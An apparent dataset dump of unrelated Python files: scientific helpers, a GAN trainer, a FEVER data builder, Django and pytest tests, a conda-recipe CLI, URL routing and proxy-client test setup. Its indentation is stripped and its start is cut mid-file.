#% Computes Q, neccesary constant#% Computes Q, neccesary constant
#% for the moments computation#% for the moments computation
#
aux_1=cfg.power(-1,k+nu)/cfg.power(4.0,k) #aux_1=power(-1,k+nu)/power(4,k)
aux_2=cfg.sqrt((2*l+4*k+3)/3.0) #aux_2=sqrt((2*l+4*k+3)/3)
aux_3=cfg.trinomial(nu,k-nu,l+nu+1)*cfg.nchoosek(2*(l+nu+1+k),l+nu+1+k) #aux_3=trinomial(nu,k-nu,l+nu+1)*nchoosek(2*(l+nu+1+k),l+nu+1+k)
aux_4=cfg.nchoosek(2.0*(l+nu+1),l+nu+1) #aux_4=nchoosek(2*(l+nu+1),l+nu+1)
q=(aux_1*aux_2*aux_3)/aux_4 #q=(aux_1*aux_2*aux_3)/aux_4
return q
|
158376
|
from src.stores.amazon import *
class AmazonSimulation:
@staticmethod
def test(url):
page = get_page(url)
text = page.text
content = page.content
tree = html.fromstring(content)
price = get_price(tree)
mpn = get_mpn(text)
print(price)
print(mpn)
@staticmethod
def run_test():
# Should work
# url = 'https://www.amazon.com/Crucial-MX500-NAND-SATA-Internal/dp/B077SF8KMG'
#
# Should work
# url = 'https://www.amazon.com/gp/product/B073TQKNF2/'
#
# Should work
# url = 'https://www.amazon.com/RIPJAWS-KM570-Cherry-Speed-Silver/dp/B01LZEVDKI/'
#
# Should work
# url = 'https://www.amazon.com/Kingston-120GB-Solid-SA400S37-120G/dp/B01N6JQS8C/ref=mp_s_a_1_6?ie=UTF8&qid=1528906162&sr=8-6&pi=AC_SX236_SY340_QL65&keywords=ssd&dpPl=1&dpID=41EjY-AhQUL&ref=plSrch'
#
# Should work
# url = 'https://www.amazon.com/TP-Link-RangeBoost-Technology-Archer-A2300/dp/B0751RK6XZ/ref=sr_1_1?m=A3C0IBSA2XBL9N&s=merchant-items&ie=UTF8&qid=1528439208&sr=1-1&refinements=p_4%3ATP-Link&dpID=51LmWDKvBnL&preST=_SX300_QL70_&dpSrc=srch'
#
# Should fail
# url = 'https://www.amazon.com/Home-Audio-Electronics/b/ref=nav_shopall_hat?ie=UTF8&node=667846011'
#
# AmazonSimulation.test(url)
pass
if __name__ == '__main__':
AmazonSimulation.run_test()
|
158390
|
import torch
import torchvision
import os
from torch import optim
from torch.autograd import Variable
from model import Discriminator
from model import Generator
class Solver(object):
def __init__(self, config, data_loader):
self.generator = None
self.discriminator = None
self.g_optimizer = None
self.d_optimizer = None
self.g_conv_dim = config.g_conv_dim
self.d_conv_dim = config.d_conv_dim
self.z_dim = config.z_dim
self.beta1 = config.beta1
self.beta2 = config.beta2
self.image_size = config.image_size
self.data_loader = data_loader
self.num_epochs = config.num_epochs
self.batch_size = config.batch_size
self.sample_size = config.sample_size
self.lr = config.lr
self.log_step = config.log_step
self.sample_step = config.sample_step
self.sample_path = config.sample_path
self.model_path = config.model_path
self.build_model()
def build_model(self):
"""Build generator and discriminator."""
self.generator = Generator(z_dim=self.z_dim,
image_size=self.image_size,
conv_dim=self.g_conv_dim)
self.discriminator = Discriminator(image_size=self.image_size,
conv_dim=self.d_conv_dim)
self.g_optimizer = optim.Adam(self.generator.parameters(),
self.lr, [self.beta1, self.beta2])
self.d_optimizer = optim.Adam(self.discriminator.parameters(),
self.lr, [self.beta1, self.beta2])
if torch.cuda.is_available():
self.generator.cuda()
self.discriminator.cuda()
def to_variable(self, x):
"""Convert tensor to variable."""
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def to_data(self, x):
"""Convert variable to tensor."""
if torch.cuda.is_available():
x = x.cpu()
return x.data
def reset_grad(self):
"""Zero the gradient buffers."""
self.discriminator.zero_grad()
self.generator.zero_grad()
def denorm(self, x):
"""Convert range (-1, 1) to (0, 1)"""
out = (x + 1) / 2
return out.clamp(0, 1)
def train(self):
"""Train generator and discriminator."""
fixed_noise = self.to_variable(torch.randn(self.batch_size, self.z_dim))
total_step = len(self.data_loader)
for epoch in range(self.num_epochs):
for i, images in enumerate(self.data_loader):
#===================== Train D =====================#
images = self.to_variable(images)
batch_size = images.size(0)
noise = self.to_variable(torch.randn(batch_size, self.z_dim))
# Train D to recognize real images as real.
outputs = self.discriminator(images)
real_loss = torch.mean((outputs - 1) ** 2) # L2 loss instead of Binary cross entropy loss (this is optional for stable training)
# Train D to recognize fake images as fake.
fake_images = self.generator(noise)
outputs = self.discriminator(fake_images)
fake_loss = torch.mean(outputs ** 2)
# Backprop + optimize
d_loss = real_loss + fake_loss
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
#===================== Train G =====================#
noise = self.to_variable(torch.randn(batch_size, self.z_dim))
# Train G so that D recognizes G(z) as real.
fake_images = self.generator(noise)
outputs = self.discriminator(fake_images)
g_loss = torch.mean((outputs - 1) ** 2)
# Backprop + optimize
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# print the log info
if (i+1) % self.log_step == 0:
print('Epoch [%d/%d], Step[%d/%d], d_real_loss: %.4f, '
'd_fake_loss: %.4f, g_loss: %.4f'
%(epoch+1, self.num_epochs, i+1, total_step,
real_loss.data[0], fake_loss.data[0], g_loss.data[0]))
# save the sampled images
if (i+1) % self.sample_step == 0:
fake_images = self.generator(fixed_noise)
torchvision.utils.save_image(self.denorm(fake_images.data),
os.path.join(self.sample_path,
'fake_samples-%d-%d.png' %(epoch+1, i+1)))
# save the model parameters for each epoch
g_path = os.path.join(self.model_path, 'generator-%d.pkl' %(epoch+1))
d_path = os.path.join(self.model_path, 'discriminator-%d.pkl' %(epoch+1))
torch.save(self.generator.state_dict(), g_path)
torch.save(self.discriminator.state_dict(), d_path)
def sample(self):
# Load trained parameters
g_path = os.path.join(self.model_path, 'generator-%d.pkl' %(self.num_epochs))
d_path = os.path.join(self.model_path, 'discriminator-%d.pkl' %(self.num_epochs))
self.generator.load_state_dict(torch.load(g_path))
self.discriminator.load_state_dict(torch.load(d_path))
self.generator.eval()
self.discriminator.eval()
# Sample the images
noise = self.to_variable(torch.randn(self.sample_size, self.z_dim))
fake_images = self.generator(noise)
sample_path = os.path.join(self.sample_path, 'fake_samples-final.png')
torchvision.utils.save_image(self.denorm(fake_images.data), sample_path, nrow=12)
print("Saved sampled images to '%s'" %sample_path)
|
158392
|
import json
import random
from collections import defaultdict
import heapq
import pymysql.cursors
import os
# Connect to the database
import sys
connection = pymysql.connect(host=os.getenv("DB_HOST", "localhost"),
user=os.getenv("DB_USER", "root"),
password=os.getenv("DB_PASS", ""),
db=os.getenv("DB_SCHEMA", "fever"),
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
def evidence(claim_id):
cl_support = [ev for ev in claim_evidence[claim_id] if ev["label"] == "SUPPORTS" ]
cl_refutes = [ev for ev in claim_evidence[claim_id] if ev["label"] == "REFUTES" ]
cl_notenough = [ev for ev in claim_evidence[claim_id] if ev["verifiable"] == "NOT ENOUGH INFO"]
return cl_support,cl_refutes,cl_notenough
claim_evidence = defaultdict(lambda: [])
try:
with connection.cursor() as cursor:
sql = """
select claim.id, claim.text,
CASE
WHEN annotation.verifiable =1 THEN 'VERIFIABLE'
WHEN annotation.verifiable =2 THEN 'NOT ENOUGH INFO'
WHEN annotation.verifiable =3 THEN 'NOT VERIFIABLE'
WHEN annotation.verifiable =4 THEN 'TYPO'
END as verifiable,
CASE
WHEN verdict=1 THEN 'SUPPORTS'
WHEN verdict=2 THEN 'REFUTES'
END as label, sentence.entity_id as entity, annotation.id as aid, annotation_verdict.id as vid, verdict_line.page, verdict_line.line_number, testing, isOracle,isReval, isTestMode,isOracleMaster,isDiscounted from annotation
inner join claim on annotation.claim_id = claim.id
left join annotation_verdict on annotation.id = annotation_verdict.annotation_id
left join verdict_line on annotation_verdict.id = verdict_line.verdict_id
inner join sentence on claim.sentence_id = sentence.id
where isForReportingOnly = 0 and isTestMode = 0 and testing= 0
"""
cursor.execute(sql)
result = cursor.fetchall()
for res in result:
claim_evidence[res['id']].append(res)
finally:
connection.close()
def process(ids):
data = []
print(len(ids))
for id in ids:
cl0 = claim_evidence[id][0]
support_evidence, refute_evidence, not_enough_info_evidence = evidence(id)
if len(set([ev["aid"] for ev in support_evidence])) > len(set([ev["aid"] for ev in not_enough_info_evidence])):
not_enough_info_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) > len(set([ev["aid"] for ev in not_enough_info_evidence])):
not_enough_info_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) < len(set([ev["aid"] for ev in not_enough_info_evidence])):
support_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) < len(set([ev["aid"] for ev in not_enough_info_evidence])):
refute_evidence = []
s_s = defaultdict(lambda:[])
s_r = defaultdict(lambda:[])
s_nei = defaultdict(lambda:[])
for e in support_evidence:
s_s[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
for e in refute_evidence:
s_r[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
for e in not_enough_info_evidence:
s_nei[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
if len(support_evidence):
data.append({"id":id, "verifiable":"VERIFIABLE", "label":"SUPPORTS","claim":cl0['text'],"evidence":list(s_s.values())})
if len(refute_evidence):
data.append({"id": id, "verifiable":"VERIFIABLE", "label": "REFUTES", "claim": cl0['text'], "evidence":list(s_r.values())})
if len(not_enough_info_evidence):
data.append({"id": id, "verifiable":"NOT ENOUGH INFO", "label": None, "claim": cl0['text'], "evidence":list(s_nei.values())})
return data
cnt=0
with open("train.ids.json", "r") as f:
train_ids = json.load(f)
print(train_ids[:10])
train = process(train_ids)
with open("dev.ids.json", "r") as f:
dev_ids = json.load(f)
print(dev_ids[:10])
dev = process(dev_ids)
with open("test.ids.json", "r") as f:
test_ids = json.load(f)
print(test_ids[:10])
test = process(test_ids)
with open("train.jsonl","w+") as f:
for line in train:
f.write(json.dumps(line)+"\n")
with open("dev.jsonl","w+") as f:
for line in dev:
f.write(json.dumps(line)+"\n")
with open("test.jsonl","w+") as f:
for line in test:
f.write(json.dumps(line)+"\n")
print(len(train),len(dev),len(test))
|
158429
|
from logging import addLevelName
from multiprocessing import Event
# Our custom log severity. We need this because we want to see some special messages and on node the default log level
# of workers is set to WARNING (INFO would be too much noise). These messages are not errors nor warnings, but can help
# in some situations (e.g. tracing tasks).
IMPORTANT = 35
addLevelName(IMPORTANT, 'IMPORTANT')
# Que events
E_SHUTDOWN = Event()
# Task queues
Q_FAST = 'fast'
Q_SLOW = 'slow'
Q_MGMT = 'mgmt'
Q_BACKUP = 'backup'
Q_IMAGE = 'image'
# Task types
TT_DUMMY = 'd'
TT_EXEC = 'e'
TT_AUTO = 'a'
TT_MGMT = 'm'
TT_INTERNAL = 'i'
TT_ERROR = 'f'
TT = (TT_DUMMY, TT_EXEC, TT_AUTO, TT_MGMT, TT_INTERNAL, TT_ERROR)
# Task groups
TG_DC_BOUND = 'd'
TG_DC_UNBOUND = 'u'
TG = (TG_DC_BOUND, TG_DC_UNBOUND)
|
158441
|
from invoicing.latex.latex_templating import LatexTemplating
class LatexInvoice(LatexTemplating):
def generate(self, reference_code, company_name, company_address, created_at, total_cost, jobs):
template = self.latex_jinja_env.get_template('templates/Invoice.example.tex')
if len(jobs) == 0:
jobs.append({
'title': '-',
'description': '-',
'type': '-',
'actual_time': '-',
'staff_rate': '-',
'cost': '-'
})
tex = template.render(
reference_code=self.tex_escape(reference_code),
company_name=self.tex_escape(company_name),
company_address=self.tex_escape(company_address),
date=self.tex_escape(created_at),
total_cost=self.tex_escape(total_cost),
jobs=[(lambda job: {k: self.tex_escape(v) for k, v in job.items()})(job) for job in jobs]
)
file_name = reference_code + " " + company_name
self.create_tex_file(tex, file_name)
self.create_pdf(file_name)
if __name__ == '__main__':
LatexInvoice().generate(
'I-7001',
'Widget Corp',
'100 Some street, A city, A town, BO41 0PN',
'14/10/2018',
'$160',
[{
'title': 'Job 1',
'description': 'Do something',
'type': 'service',
'actual_time': '4h',
'staff_rate': '$40',
'cost': '$160'
}]
)
|
158453
|
from django.test import TestCase
from mock import patch
from digest.management.commands.import_importpython import ImportPythonParser
from digest.utils import MockResponse, read_fixture
class ImportPythonWeeklyTest(TestCase):
def setUp(self):
self.url = "http://importpython.com/newsletter/no/60/"
test_fixture = 'fixture_test_import_importpython_test_get_blocks.txt'
self.patcher = patch(
'digest.management.commands.import_importpython.urlopen')
self.urlopen_mock = self.patcher.start()
self.urlopen_mock.return_value = MockResponse(
read_fixture(test_fixture))
self.parser = ImportPythonParser()
def tearDown(self):
self.patcher.stop()
def test_correctly_creates_issue_urls(self):
self.assertEqual(ImportPythonParser.get_issue_url(2),
"http://importpython.com/static/files/issue2.html")
self.assertEqual(ImportPythonParser.get_issue_url(12),
"http://importpython.com/newsletter/draft/12")
self.assertEqual(ImportPythonParser.get_issue_url(56),
"http://importpython.com/newsletter/no/56")
with self.assertRaises(ValueError):
ImportPythonParser.get_issue_url(-100)
def test_correct_number_of_blocks_parsed(self):
blocks = self.parser.get_blocks(self.url)
self.assertEqual(len(blocks), 25)
def test_correctly_parses_block(self):
blocks = self.parser.get_blocks(self.url)
block = blocks[0]
self.assertEqual(block['link'],
"https://talkpython.fm/episodes/show/44/project-jupyter-and-ipython")
self.assertEqual(block['title'],
"Project Jupyter and IPython Podcast Interview")
self.assertEqual(block['content'],
"One of the fastest growing areas in Python is scientific computing. In scientific computing with Python, there are a few key packages that make it special. These include NumPy / SciPy / and related packages. The one that brings it all together, visually, is IPython (now known as Project Jupyter). That's the topic on episode 44 of Talk Python To Me. ")
def test_correctly_gets_latest_url(self):
test_latest = 'fixture_test_import_importpython_test_get_latest_url.txt'
self._old_return_value = self.urlopen_mock.return_value
self.urlopen_mock.return_value = MockResponse(read_fixture(test_latest))
latest_url = self.parser.get_latest_issue_url()
self.assertEqual(latest_url,
"http://importpython.com/newsletter/no/72/")
|
158463
|
import os
import random
from collections import defaultdict
import boto3
import pytest
from xoto3.dynamodb.update import versioned_diffed_update_item
from xoto3.dynamodb.utils.expressions import add_variables_to_expression
from xoto3.dynamodb.utils.table import extract_key_from_item, table_primary_keys
_TEST_TABLE_NAME = os.environ.get("XOTO3_TEST_DYNAMODB_TABLE_NAME", "")
def test_add_variables_to_expression():
variables = dict(deletedAt="2020-01-01T00:00:00.000000Z", do_a_thing="okay")
query_dict = add_variables_to_expression(dict(), variables)
assert query_dict["ExpressionAttributeNames"] == {
"#deletedAt": "deletedAt",
"#do_a_thing": "do_a_thing",
}
assert query_dict["ExpressionAttributeValues"] == {
":deletedAt": "2020-01-01T00:00:00.000000Z",
":do_a_thing": "okay",
}
def test_add_variables_to_expression_with_bad_attribute_name():
variables = {"thingy": "THINGY", "deleted__At": "2020-02-02T00:00:00.000000Z"}
query_dict = add_variables_to_expression(dict(), variables)
assert query_dict["ExpressionAttributeNames"] == {
"#thingy": "thingy",
"#deleted__At": "deleted__At",
}
assert query_dict["ExpressionAttributeValues"] == {
":thingy": "THINGY",
":deleted__At": "2020-02-02T00:00:00.000000Z",
}
def test_add_variables_to_expression_with_duplicate_attribute_name():
query_dict = dict(ExpressionAttributeNames={"#deletedAt": "deletedAt"})
variables = dict(deletedAt="2020-02-02T00:00:00.000000Z")
with pytest.raises(
ValueError, match="Cannot add a duplicate expression attribute name #deletedAt"
):
add_variables_to_expression(query_dict, variables)
def test_add_variables_to_expression_with_duplicate_attribute_value():
query_dict = dict(ExpressionAttributeValues={":deletedAt": "2020-01-01T00:00:00.000000Z"})
variables = dict(deletedAt="2020-02-02T00:00:00.000000Z")
with pytest.raises(
ValueError, match="Cannot add a duplicate expression attribute value :deletedAt"
):
add_variables_to_expression(query_dict, variables)
@pytest.fixture
def fix_item():
items_to_clean_by_table_name = defaultdict(list)
def _create_item(table, item: dict):
table.put_item(Item=item)
items_to_clean_by_table_name[table.name].append(item)
return item
yield _create_item
ddb = boto3.resource("dynamodb")
for table_name, items in items_to_clean_by_table_name.items():
for item in items:
table = ddb.Table(table_name)
table.delete_item(Key=extract_key_from_item(table, item))
def test_expression_attributes_against_dynamodb(fix_item, integration_test_id_table):
item_random_key = {
attr: "xoto3-integ-test" + str(random.randint(0, 99999999999))
for attr in table_primary_keys(integration_test_id_table)
}
# requires string attributes for the primary key because i'm too
# lazy to make this key generation fancier for a test.
bad_attr = "~known-bad*chars"
fix_item(integration_test_id_table, {**item_random_key, **{bad_attr: "some random data"}})
def del_bad_attr(item):
item.pop(bad_attr, None)
return item
result = versioned_diffed_update_item(integration_test_id_table, del_bad_attr, item_random_key)
assert bad_attr not in result
|
158464
|
import unittest
from kbmodpy import kbmod as kb
class test_import(unittest.TestCase):
def setUp(self):
#kb.
pass
def test_something(self):
#self.assertGreater( a , b )
#self.assertEqual( a , b )
pass
|
158470
|
import argparse
import logging
import os
import sys
import requests
from colorama import Fore, Style, init
from colorama.ansi import clear_screen
import grayskull
from grayskull.base.factory import GrayskullFactory
from grayskull.cli import CLIConfig
from grayskull.cli.parser import parse_pkg_name_version
from grayskull.cli.stdout import print_msg
from grayskull.utils import origin_is_github
init(autoreset=True)
logging.basicConfig(format="%(levelname)s:%(message)s")
def main(args=None):
if not args:
args = sys.argv[1:] if sys.argv[1:] else ["--help"]
parser = argparse.ArgumentParser(description="Grayskull - Conda recipe generator")
pypi_parser = parser.add_subparsers(help="Options to generate PyPI recipes")
pypi_cmds = pypi_parser.add_parser("pypi", help="Generate recipes based on PyPI")
pypi_cmds.add_argument(
"pypi_packages", nargs="+", help="Specify the PyPI packages name.", default=[]
)
pypi_cmds.add_argument(
"--download",
"-d",
dest="download",
action="store_true",
default=False,
help="Download the sdist package and PyPI information in the same folder"
" the recipe is located.",
)
pypi_cmds.add_argument(
"--maintainers",
"-m",
dest="maintainers",
nargs="+",
help="List of maintainers which will be added to the recipe.",
)
parser.add_argument(
"--version",
"-v",
default=False,
action="store_true",
dest="version",
help="Print Grayskull version and exit",
)
parser.add_argument(
"--heman",
"--shera",
default=False,
action="store_true",
dest="grayskull_power",
help=argparse.SUPPRESS,
)
pypi_cmds.add_argument(
"--output",
"-o",
dest="output",
default=".",
help="Path to where the recipe will be created",
)
pypi_cmds.add_argument(
"--stdout",
dest="stdout",
default=True,
help="Disable or enable stdout, if it is False, Grayskull"
" will disable the prints. Default is True",
)
pypi_cmds.add_argument(
"--list-missing-deps",
default=False,
action="store_true",
dest="list_missing_deps",
help="After the execution Grayskull will print all the missing dependencies.",
)
pypi_cmds.add_argument(
"--strict-conda-forge",
default=False,
action="store_true",
dest="is_strict_conda_forge",
help="It will generate the recipes strict for the conda-forge channel.",
)
args = parser.parse_args(args)
if args.version:
print(grayskull.__version__)
return
logging.debug(f"All arguments received: args: {args}")
if args.grayskull_power:
print(
f"{Fore.BLUE}By the power of Grayskull...\n"
f"{Style.BRIGHT}I have the power!"
)
return
CLIConfig().stdout = args.stdout
CLIConfig().list_missing_deps = args.list_missing_deps
print_msg(Style.RESET_ALL)
print_msg(clear_screen())
for pkg_name in args.pypi_packages:
logging.debug(f"Starting grayskull for pkg: {pkg_name}")
pypi_label = "" if origin_is_github(pkg_name) else " (pypi)"
print_msg(
f"{Fore.GREEN}\n\n"
f"#### Initializing recipe for "
f"{Fore.BLUE}{pkg_name}{pypi_label} {Fore.GREEN}####\n"
)
pkg_name, pkg_version = parse_pkg_name_version(pkg_name)
try:
recipe = GrayskullFactory.create_recipe(
"pypi",
pkg_name,
pkg_version,
download=args.download,
is_strict_cf=args.is_strict_conda_forge,
)
except requests.exceptions.HTTPError as err:
print_msg(
f"{Fore.RED}Package seems to be missing on pypi.\nException: {err}\n\n"
)
continue
recipe.generate_recipe(args.output, mantainers=args.maintainers)
print_msg(
f"\n{Fore.GREEN}#### Recipe generated on "
f"{os.path.realpath(args.output)} for {pkg_name} ####\n"
)
if __name__ == "__main__":
main(sys.argv[1:])
|
158543
|
from .builder import build_feature_extractor # noqa 401
from .decoders import build_brick, build_bricks, build_decoder # noqa 401
from .encoders import build_backbone, build_encoder, build_enhance_module # noqa 401
|
158548
|
import logging
from aiotasks import run_with_exceptions_and_logs, SharedConfig
def test_run_with_exceptions_and_logs_oks(monkeypatch):
logger = logging.getLogger("aiotasks")
class CustomLogger(logging.StreamHandler):
def __init__(self):
super(CustomLogger, self).__init__()
self.content = []
def emit(self, record):
self.content.append(record.msg)
custom = CustomLogger()
logger.addHandler(custom)
run_with_exceptions_and_logs(lambda x: x, 0)
assert "Starting aioTasks" in custom.content
def test_run_with_exceptions_and_logs_exception_raised(monkeypatch):
def raise_exception(x):
raise Exception()
monkeypatch.setattr(
"aiotasks.actions.worker.console.find_manager",
raise_exception)
logger = logging.getLogger("aiotasks")
class CustomLogger(logging.StreamHandler):
def __init__(self):
super(CustomLogger, self).__init__()
self.content = []
def emit(self, record):
self.content.append(record.msg)
custom = CustomLogger()
logger.addHandler(custom)
run_with_exceptions_and_logs(raise_exception, 0)
assert "[!] Unhandled exception: " in custom.content
def test_run_with_exceptions_and_logs_ctrl_plus_c_raised(monkeypatch):
def raise_exception(x):
raise KeyboardInterrupt()
monkeypatch.setattr(
"aiotasks.actions.worker.console.find_manager",
raise_exception)
logger = logging.getLogger("aiotasks")
class CustomLogger(logging.StreamHandler):
def __init__(self):
super(CustomLogger, self).__init__()
self.content = []
def emit(self, record):
self.content.append(record.msg)
custom = CustomLogger()
logger.addHandler(custom)
run_with_exceptions_and_logs(raise_exception, 1)
assert "[*] CTRL+C caught. Exiting..." in custom.content
|
158557
|
from __future__ import absolute_import
from sentry.models import AuditLogEntry
from sentry.web.frontend.base import OrganizationView
class OrganizationAuditLogView(OrganizationView):
required_scope = 'org:write'
def get(self, request, organization):
queryset = AuditLogEntry.objects.filter(
organization=organization,
).select_related('actor', 'target_user').order_by('-datetime')
context = {
'audit_log_queryset': queryset,
}
return self.respond('sentry/organization-audit-log.html', context)
|
158575
|
class Atom(object):
""" """
def __init__(self, index, name=None, residue_index=-1, residue_name=None):
"""Create an Atom object
Args:
index (int): index of atom in the molecule
name (str): name of the atom (eg., N, CH)
residue_index (int): index of residue in the molecule
residue_name (str): name of the residue (eg., THR, CYS)
"""
self.index = index
self.name = name
self.residue_index = residue_index
self.residue_name = residue_name
self._position = list()
self._velocity = list()
self._force = list()
self._atomtype = dict()
self.bondingtype = None
self.atomic_number = None
self.cgnr = None
self._mass = dict()
self._charge = dict()
self.ptype = "A"
self._sigma = dict()
self._epsilon = dict()
@property
def atomtype(self):
return self._atomtype
@atomtype.setter
def atomtype(self, index_atomtype):
"""Sets the atomtype
Args:
index_atomtype (tuple): A or B state and atomtype
"""
try:
idx, val = index_atomtype
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._atomtype[idx] = val
@property
def sigma(self):
return self._sigma
@sigma.setter
def sigma(self, index_sigma):
"""Sets the sigma
Args:
index_sigma (tuple): A or B state and sigma
"""
try:
idx, val = index_sigma
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._sigma[idx] = val
@property
def epsilon(self):
return self._epsilon
@epsilon.setter
def epsilon(self, index_epsilon):
"""Sets the epsilon
Args:
index_epsilon (tuple): A or B state and epsilon
"""
try:
idx, val = index_epsilon
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._epsilon[idx] = val
@property
def mass(self):
return self._mass
@mass.setter
def mass(self, index_mass):
"""Sets the mass
Args:
index_mass (tuple): A or B state and mass
"""
try:
idx, val = index_mass
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._mass[idx] = val
@property
def charge(self):
return self._charge
@charge.setter
def charge(self, index_charge):
"""Sets the charge
Args:
index_charge (tuple): A or B state and charge
"""
try:
idx, val = index_charge
except ValueError:
raise ValueError("Pass an iterable with two items.")
else:
self._charge[idx] = val
@property
def position(self):
"""Return the cartesian coordinates of the atom """
return self._position
@position.setter
def position(self, xyz):
"""Sets the position of the atom
Args:
xyz (list, float): x, y and z coordinates
"""
self._position = xyz
@property
def velocity(self):
"""Return the velocity of the atom"""
return self._velocity
@velocity.setter
def velocity(self, vxyz):
"""Sets the velocity of the atom
Args:
vxyz (list, float): x-, y- and z-directed velocity
"""
self._velocity = vxyz
@property
def force(self):
"""Return the force on the atom """
return self._force
@force.setter
def force(self, fxyz):
"""Sets the force on the atom
Args:
fxyz (list, float): x-, y- and z-directed force
"""
self._force = fxyz
def __repr__(self):
return 'Atom{0}({1}, {2})'.format(id(self), self.index, self.name)
def __str__(self):
return 'Atom({0}, {1})'.format(self.index, self.name)
|
158580
|
import json
class AstToken:
def __init__(self, lex_token):
self.name = lex_token.type
if lex_token.value != self.name:
self.value = lex_token.value
def __str__(self):
return json.dumps(self, cls=AstTokenEncoder)
class AstTokenList:
def __init__(self, tokens):
self.tokens = tokens
def __str__(self):
return json.dumps(self.tokens, cls=AstTokenEncoder)
class AstTokenEncoder(json.JSONEncoder):
def default(self, some_object):
if not isinstance(some_object, AstToken):
return super(AstTokenEncoder, self).default(some_object)
return some_object.__dict__
|
158581
|
import unittest
import pandas as pd
from reamber.base import Hold
class TestHold(unittest.TestCase):
""" The purpose of this test is to test the architecture of Base. """
def setUp(self) -> None:
self.hold = Hold(offset=1000, column=1, length=1000)
# @profile
def test_type(self):
self.assertTrue(isinstance(self.hold.data, pd.Series))
def test_eq(self):
self.assertEqual(Hold(offset=1000, column=1, length=1000), self.hold)
self.assertNotEqual(Hold(offset=1000, column=1, length=2000), self.hold)
def test_length(self):
self.assertEqual(1000, self.hold.length)
def test_tail_offset(self):
self.assertEqual(2000, self.hold.tail_offset)
def test_deepcopy(self):
self.assertFalse(self.hold is Hold(offset=1000, column=1, length=1000))
self.assertFalse(self.hold is self.hold.deepcopy())
hold = self.hold
self.assertTrue(self.hold is hold)
def test_length_op(self):
self.assertEqual(1000, self.hold.length)
self.hold.length *= 2
self.assertEqual(2000, self.hold.length)
self.assertEqual(3000, self.hold.tail_offset)
# An odd occurrence, but we support negative lengths.
self.hold.length = -1000
self.assertEqual(-1000, self.hold.length)
self.assertEqual(0, self.hold.tail_offset)
if __name__ == '__main__':
unittest.main()
|
158584
|
from django.urls import include, path
#
# On Reversing URLs
# =================
#
# Recommended Usage:
# Always use rest_framework.reverse.reverse, do not directly use django.urls.reverse.
# If a request object r is available, use reverse(name, request=r). With the name as defined
# in desecapi.urls.v1 or desecapi.urls.v2. It will return an URL maintaining the currently requested API version.
# If there is no request object available, e.g. in commands, a mock object can be constructed
# carrying all information that is necessary to construct a full URL:
#
# from django.conf import settings
# from django.test import RequestFactory
# from rest_framework.versioning import NamespaceVersioning
#
# r = RequestFactory().request(HTTP_HOST=settings.ALLOWED_HOSTS[0])
# r.version = 'v1'
# r.versioning_scheme = NamespaceVersioning()
#
# Also note in this context settings.REST_FRAMEWORK['ALLOWED_VERSIONS'] and
# settings.REST_FRAMEWORK['DEFAULT_VERSIONING_CLASS']. (The latter is of type string.)
#
# Advanced Usage:
# Prefix the name of any path with 'desecapi' to get the default version,
# or prefix the name of any path with the desired namespace, e.g. 'v1:root'.
# In this case, the version information of the request will be ignored and
# providing a request object is optional. However, if no request object is provided,
# only a relative URL can be generated.
#
# Examples:
# The examples refer to the version used by the client to connect as the REQUESTED version,
# the version specified by the first argument to reverse as the SPECIFIED version, and to the
# version defined as default (see below) as the DEFAULT version.
#
# reverse('root', request) -> absolute URL, e.g. https://.../api/v1/, with the REQUESTED version
# reverse('root') -> django.urls.exceptions.NoReverseMatch
# reverse('desecapi:root') -> relative URL, e.g. api/v1/, with the DEFAULT version
# reverse('v2:root') -> relative URL, e.g. api/v2/, with the SPECIFIED version
# reverse('v2:root', request) -> absolute URL, e.g. https://.../api/v2/, with the SPECIFIED version
# reverse('desecapi:root', request) -> absolute URL, e.g. https://.../api/v1/, with the DEFAULT version
# reverse('v1:root', request) -> absolute URL, e.g. https://.../api/v1/, with the SPECIFIED version
#
# See Also:
# https://github.com/encode/django-rest-framework/issues/5659
# https://github.com/encode/django-rest-framework/issues/3825
#
# Note that from the client's perspective, there is no default version: each request needs to
# specify the version in the request URL.
#
# IMPORTANT: specify default version as the last element in the list
# if no other information is available, the last-specified version will be used as default for reversing URLs
urlpatterns = [
# other available versions in no particular order
path('api/v2/', include('desecapi.urls.version_2', namespace='v2')),
# the DEFAULT version
path('api/v1/', include('desecapi.urls.version_1', namespace='v1')),
# monitoring
path('', include('django_prometheus.urls')),
]
|
158590
|
def method1(ll1, ll2, n1, n2):
hs = set()
for i in range(0, n1):
hs.add(ll1[i])
print("Intersection:")
for i in range(0, n2):
if ll2[i] in hs:
print(ll2[i], end=" ")
if __name__ == "__main__":
"""
from timeit import timeit
ll1 = [7, 1, 5, 2, 3, 6]
ll2 = [3, 8, 6, 20, 7]
n1 = len(ll1)
n2 = len(ll2)
print(timeit(lambda: method1(ll1, ll2, n1, n2), number=10000)) # 0.11873356500291266
"""
|
158668
|
import ssl
import httpcore
import httpx
import pytest # noqa
from yarl import URL # noqa
from httpx_socks import (
ProxyType,
AsyncProxyTransport,
ProxyError,
ProxyConnectionError,
ProxyTimeoutError,
)
from tests.config import (
TEST_HOST_PEM_FILE, TEST_URL_IPV4, TEST_URL_IPV4_HTTPS, SOCKS5_IPV4_URL,
LOGIN, PASSWORD, PROXY_HOST_IPV4, SOCKS5_PROXY_PORT, TEST_URL_IPV4_DELAY,
SKIP_IPV6_TESTS, SOCKS5_IPV6_URL, SOCKS4_URL, HTTP_PROXY_URL,
)
def create_ssl_context(url):
parsed_url = URL(url)
if parsed_url.scheme == 'https':
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS)
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.load_verify_locations(TEST_HOST_PEM_FILE)
return ssl_context
else:
return None
async def fetch(transport: AsyncProxyTransport,
url: str, timeout: httpx.Timeout = None):
async with httpx.AsyncClient(transport=transport) as client:
res = await client.get(url=url, timeout=timeout)
return res
